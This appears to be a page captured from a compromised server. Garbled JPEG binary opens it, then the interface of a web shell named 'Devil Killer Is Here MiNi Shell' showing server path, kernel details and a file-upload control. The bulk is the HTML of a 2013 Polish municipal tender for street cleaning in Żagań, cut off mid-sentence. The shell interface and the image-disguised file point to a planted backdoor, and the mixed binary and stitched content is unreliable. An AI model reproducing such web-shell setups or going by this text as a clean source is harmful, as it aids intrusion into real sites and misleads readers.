JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130321/113922-N-2013.html

<p class="kh_header"><b>Żagań: UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA TERENIE GMINY ŻAGAŃ O STATUSIE MIEJSKIM, polegające na : mechanicznym i ręcznym zamiataniu ulic, opróżnianiu i wywozie śmieci z koszy ulicznych</b><br>
<b>Numer ogłoszenia: 113922 - 2013; data zamieszczenia: 21.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE CZYSTOŚCI I PORZĄDKU NA TERENIE GMINY ŻAGAŃ O STATUSIE MIEJSKIM, polegające na : mechanicznym i ręcznym zamiataniu ulic, opróżnianiu i wywozie śmieci z koszy ulicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia w szczególności obejmuje :
1) mechaniczne i ręczne oczyszczanie ulic, parkingów, placów gminnych, placów 
    zabaw, przystanków komunikacji publicznej, chodników i alejek z błota, piasku, 
    liści i innych zanieczyszczeń (tj. odchodów zwierzęcych, zanieczyszczeń 
    roślinnych - chwastów, traw rosnących w pasie drogowym oraz ciągach  
    pieszych i chodnikach).
    Powierzchnia ulic, parkingów i placów objęta oczyszczaniem  - ogółem  82 
    796,00 m2. Powierzchnia chodników i alejek objęta oczyszczaniem  - ogółem 28 
    940,00 m2. Razem: 111 736,00 m2. Wykaz ulic, parkingów, placów gminnych 
    objętych oczyszczaniem zawiera załącznik Nr 1 do umowy, natomiast wykaz 
    chodników i alejek - załącznik nr 2  do umowy. Liczba przystanków 
    komunikacyjnych będących w zarządzaniu Gminy Żagań o statusie miejskim 
    przewidzianych do mechanicznego i ręcznego oczyszczania - ogółem 74 szt.   
    Wykaz przystanków komunikacji publicznej przedstawia załącznik nr 3 do umowy.
    Wykaz placów zabaw dla dzieci zawiera załącznik nr 4 do umowy;
2) ulice, parkingi, place gminne, place zabaw, przystanki komunikacji publicznej, 
    chodniki i  alejki należy oczyszczać na bieżąco, aby nie dopuścić do ich 
    zanieczyszczenia;
3) opróżnianie i wywóz śmieci z koszy ulicznych - liczba koszy ogółem 246 szt.  
    Wykaz koszy ulicznych zlokalizowanych na terenie miasta Żagań zawiera 
    załącznik nr 5 do umowy; 
4) opróżnianie i wywóz śmieci z koszy ulicznych na terenie miasta Żagań obejmuje 
     w szczególności:
    a) opróżnianie koszy ulicznych wg potrzeb, aby nie dopuścić do ich 
    przepełnienia,
    b) uprzątnięcie nieczystości zlokalizowanych na ulicy w pobliżu kosza ulicznego i 
    ewentualnie ławki,
    c) bieżące mycie koszy ulicznych.
2.3. Dodatkowe informacje do przedmiotu zamówienia:
1) wszystkie materiały niezbędne do prowadzenia mechanicznego i ręcznego      
    oczyszczania ulic, parkingów, placów gminnych, placów zabaw, przystanków 
    komunikacji publicznej, chodników i alejek oraz opróżniania i wywozu śmieci z 
    koszy ulicznych, Wykonawca zapewnia we własnym zakresie, w ramach 
    ustalonego wynagrodzenia;
2) Wykonawca  przez cały  okres realizacji zamówienia  winien dysponować   
    zasobem technicznym ( sprzętem) umożliwiającym prawidłową realizację 
    przedmiotu zamówienia,  wykazanym w ofercie, a   mianowicie:
    - dwiema zamiatarkami ulicznymi o ładowności min. 4,5 ton każda, 
    - co najmniej jedną zamiatarką chodnikową o pojemności zbiornika na zmiotki 
    min. 1,5 m3, 
    - mobilnym odkurzaczem o mocy powyżej 4 kW, 
    - samochodem osobowo-ciężarowym - skrzyniowym o ładowności do 3,5 tony, 
    przeznaczonym  do opróżniania i wywozu śmieci z koszy ulicznych oraz powinien  
    na każdorazowe wezwanie Zamawiającego-  okazać  wymieniony  sprzęt  
    Zamawiającemu; 
3) Wykonawca zobowiązany jest do codziennego wykonywania prac w zakresie 
    utrzymania  czystości i porządku na następujących terenach: Bulwar nad 
    Bobrem, Park przy Szkole Podstawowej Nr 7 oraz ulice zlokalizowane w centrum 
    miasta, w szczególności: Plac Słowiański, ul. Warszawska, ul. Szprotawska,  
    Rynek, ul. Bracka, ul. Słowackiego;
4) Wykonawca zobowiązany jest do przedkładania Zamawiającemu kwartalnych 
    sprawozdań dotyczących ilości odebranych odpadów komunalnych od właścicieli 
    nieruchomości oraz kwartalnych rozliczeń ilości złożonych odpadów na 
    składowisku odpadów;
5) termin realizacji przedmiotu zamówienia może ulec zmianie w zależności od 
    panujących warunków  atmosferycznych, 
6) oczyszczanie ulic, parkingów, placów gminnych, placów zabaw, przystanków
    komunikacji publicznej oraz chodników i alejek w miesiącach: listopad i grudzień, 
    będzie uzależnione od panujących warunków atmosferycznych. Wstrzymanie 
    oczyszczania nastąpi na wniosek Zamawiającego z dniem rozpoczęcia zimowego 
    utrzymania dróg, parkingów, placów gminnych oraz chodników w Żaganiu; 
7) realizacja usługi objętej przedmiotem umowy winna być prowadzona zgodnie z 
    obowiązującymi przepisami prawa tj. ustawą  z dnia 13 września 1996 roku o 
    utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz.391); ustawą o 
    odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013 r., poz.21); zgodnie z 
    zasadami wiedzy technicznej, przepisami  BHP, z należytą  starannością, dobrze
    jakościowo i estetycznie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.91.40.00-7, 90.51.13.00-5, 90.51.32.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający  żąda od Wykonawcy wniesienia wadium.
1.2. Wadium  w wysokości 9000,00 zł, słownie: dziewięć  tysięcy złotych i 00/100, 
      należy wnieść przed upływem terminu składania ofert. 
1.3. Wadium należy wnieść w jednej  lub kilku z niżej  wymienionych  form: 
     1) pieniądzu; 
     2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
         oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze  
         poręczeniem pieniężnym; 
     3) gwarancjach bankowych; 
     4) gwarancjach ubezpieczeniowych; 
     5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 
         pkt  2  ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji 
         Rozwoju Przedsiębiorczości (Dz.U.  Nr 109, poz.1158, z późn.zm). 
1.4. Wadium wnoszone w  pieniądzu wpłaca się przelewem na rachunek bankowy
      wskazany  przez Zamawiającego nr BZ WBK S.A. I O/ Żagań 39 1090 2558 
      0000 0006  4000 0101  i   przechowuje się na tym rachunku. 
1.5.  Wadium wniesione w pieniądzu uznaje się za wniesione w sposób prawidłowy, 
       gdy kwota wadium zostanie zaksięgowana  na wskazanym koncie 
       Zamawiającego nie później, jak przed upływem terminu składania ofert. Kopię 
       dowodu wpłaty wadium Wykonawca dołącza do oferty.. 
1.6. Dokument potwierdzający wniesienie wadium  w innej formie niż w pieniądzu 
      winien być  złożony w oryginale, odrębnie od oferty,  przed terminem składania
      ofert. 
1.7. Wykonawca, którego  oferta nie będzie zabezpieczona wadium wniesionym we
      właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego  
      postępowania.
1.8. Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po
      wyborze oferty  najkorzystniejszej lub unieważnieniu postępowania, z 
      wyjątkiem Wykonawcy, którego  oferta została wybrana jako najkorzystniejsza. 
1.9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zwraca się  
      wadium  niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
      oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
1.10.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który 
       wycofał ofertę przed upływem terminu składania ofert. 
1.11.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  
       wynikającymi z umowy rachunku bankowego, na którym było ono  
       przechowywane,  pomniejszone o koszty prowadzenia rachunku bankowego 
       oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
       przez Wykonawcę. 
1.12.Zamawiający, nie później niż na 7 dni przed upływem ważności wadium, wzywa 
        Wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia 
        ważności  wadium albo wniesienia nowego wadium na okres niezbędny do 
        zabezpieczenia  postępowania do  zawarcia umowy. Jeżeli odwołanie 
        wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie 
        do Wykonawcy, którego ofertę wybrano  jako najkorzystniejszą. 
1.13.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu  
        zwrócono wadium,  jeżeli w wyniku  rozstrzygnięcia odwołania jego oferta 
        została wybrana jako najkorzystniejsza. Wykonawca wnosi  wadium w 
        terminie określonym  przez Zamawiającego.
1.14.Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w 
       odpowiedzi na   wezwanie /o uzupełnienie oświadczeń, dokumentów lub 
       pełnomocnictw, zgodnie z art.26 ust.3 i art.25 ust.1 Ustawy  Prawo zamówień 
       publicznych/  nie złożył   dokumentów lub oświadczeń czy też pełnomocnictw, 
       chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 
1.15.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
       oferta  została wybrana : 
     1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
         określonych w ofercie; 
     2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
     3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
         przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynności, Zamawiający żąda od Wykonawcy: 
 -  posiadania uprawnień do wykonywania działalności regulowanej w zakresie :  
    odbierania odpadów komunalnych od właścicieli nieruchomości z terenu miasta 
    Żagań 
 - posiadania uprawnień do transportu odpadów o kodach : 20 03 03 - odpad z
   czyszczenia ulic i placów i  20 03 01 - niesegregowane odpady komunalne, 
   zgodnie z  ustawą z dnia 13 września 1996 r. o  utrzymaniu      czystości i 
   porządku w gminach (t.j. Dz.U. z 2012 r. poz.391 ) oraz zgodnie z art. 28 ustawy 
   z dnia 27 kwietnia 2001 r. o odpadach (t.j. z 2010 r. nr 185 poz. 1243 z późn.zm, 
   w związku z art.233 ust.2 i 3 ustawy  z dnia 14 grudnia 2012 r. o odpadach 
   (Dz.U. z 2013r., poz. 21); 
 - zawartej umowy z regionalną instalacją do przetwarzania odpadów komunalnych 
   (RIPOK) lub instalacją zastępczą dla regionu zachodniego w obowiązującym Planie  
   Gospodarki Odpadami Województwa Lubuskiego, potwierdzającą odbiór odpadów z 
   czyszczenia ulic i placów oraz odpadów komunalnych z koszy ulicznych.  
   Na potwierdzenie spełnienia powyższego warunku Wykonawca złoży dokumenty  
   określone w sekcji III.4.1 pozycja 1. oraz określone w sekcji III.6 pozycja 1 i 
   pozycja 2 Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić 
   łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg Wykonawcę,  który w okresie ostatnich  trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie,  wykonał co najmniej jedną usługę, bądź usługę okresową  lub ciągłą, dotyczącą mechanicznego i ręcznego  oczyszczania ulic  o wartości usługi nie mniejszej jak 200 000,00 zł., oraz wykonał co najmniej jedną ( okresową lub ciągłą) usługę dot. opróżniania i wywozu śmieci z koszy ulicznych o wartości nie mniejszej jak 50 000,00 zł.   
Na potwierdzenie spełnienia tego warunku  Wykonawca złoży wraz z ofertą dokument określony w sekcji III.4.1  pozycja 2 ogłoszenia. 
Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     Wykonawca może polegać na wiedzy i doświadczeniu innych  podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz składając dokumenty dotyczące tego podmiotu określone w sekcji III.4.2 oraz dokumenty określone w sekcji III.6.pozycja 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym,  Zamawiający uzna za  spełniającego te wymogi tego Wykonawcę, który będzie dysponował : 
 -  co najmniej dwiema zamiatarkami ulicznymi o  ładowności 4,5 tony każda,
 -  co najmniej jedną zamiatarką chodnikową o pojemności zbiornika na zmiotki min, 
    1,5  m3, 
 -  mobilnym odkurzaczem  o mocy  powyżej 4 kW,
 - samochodem  osobowo-ciężarowym  skrzyniowym o ładowności do 3,5 tony, 
    przeznaczonym  do  opróżniania śmieci z  koszy ulicznych.  
Na  potwierdzenie spełnienia tych  warunków  Wykonawca złoży wraz z ofertą dokument określony w sekcji III.4.1 pozycja 4   ogłoszenia. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. W zakresie dysponowania odpowiednim potencjałem technicznym  Wykonawca może polegać na 
potencjale  technicznym innych podmiotów, niezależnie od  charakteru prawnego łączących go z nimi  stosunków. Wykonawca w  takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu  do dyspozycji   niezbędnych zasobów na okres korzystania z nich przy  wykonywaniu zamówienia, wskazując jakie to będą zasoby i  jaki ma charakter stosunek łączący Wykonawcę z innym podmiotem, oraz składając dokumenty dotyczące tego podmiotu określone w sekcji III.4.2 oraz dokumenty określone w; sekcji III.6. pozycja 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej,   Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który  będzie ubezpieczony   od odpowiedzialności cywilnej w  zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia  i  na potwierdzenie spełnienia tego warunku złoży wraz z ofertą  dokument określony w sekcji III.4.1 pozycja 5 ogłoszenia.  Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek złożenia poświadczeń o należytym  bądź nienależytym wykonaniu
usług, wymienionych w wykazie usług głównych, dot. wszystkich wymienionych w wykazie usług dotyczących  mechanicznego i ręcznego oczyszczania ulic   o
wartości nie mniejszej jak 200 000 zł.  oraz  wszystkich wymienionych w wykazie  usług dotyczących  opróżniania koszy ulicznych o wartości  nie  mniejszej jak 50000 zł.  Poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 
    Wykonawca, w miejsce poświadczeń może złożyć  dokumenty potwierdzające
    należyte wykonanie usługi (tzw. referencje).  
    W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi  
    wskazane w wykazie, zostały wcześniej wykonane, a w stosunku do których 
    Zamawiający żąda poświadczeń,  Wykonawca nie ma obowiązku przedkładania  
    dowodów- poświadczeń.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">nie dotyczy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. w celu wykazania spełnienia przez Wykonawcę warunków udziału w 
    postępowaniu na podstawie art.22 ust.1 ustawy Prawo zamówień  publicznych   
    Zamawiający żąda  aby  Wykonawca złożył wraz z ofertą  oświadczenie w 
    oparciu o art.44 ustawy Pzp  o spełnieniu warunków udziału w 
    postępowaniu określonych w art.22 ust.1  ustawy Prawo zamówień publicznych;
2. W celu  potwierdzenia posiadania uprawnień do wykonywania określonej 
    działalności lub czynności Zamawiający żąda :   
    - wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów 
    komunalnych od właścicieli nieruchomości z terenu miasta Żagania; 
   - aktualnego  zezwolenie na transport odpadów o kodach 20 03 03 i 20 03 01 
   - umowy z RIPOK lub instalacją zastępczą  potwierdzająca odbiór odpadów z 
   czyszczenia ulic oraz odpadów komunalnych z koszy ulicznych;   
3. Jeżeli Wykonawca wykazując spełnienie warunku posiadania wiedzy i 
    doświadczenia,  potencjału  technicznego,  polega na zasobach innych  
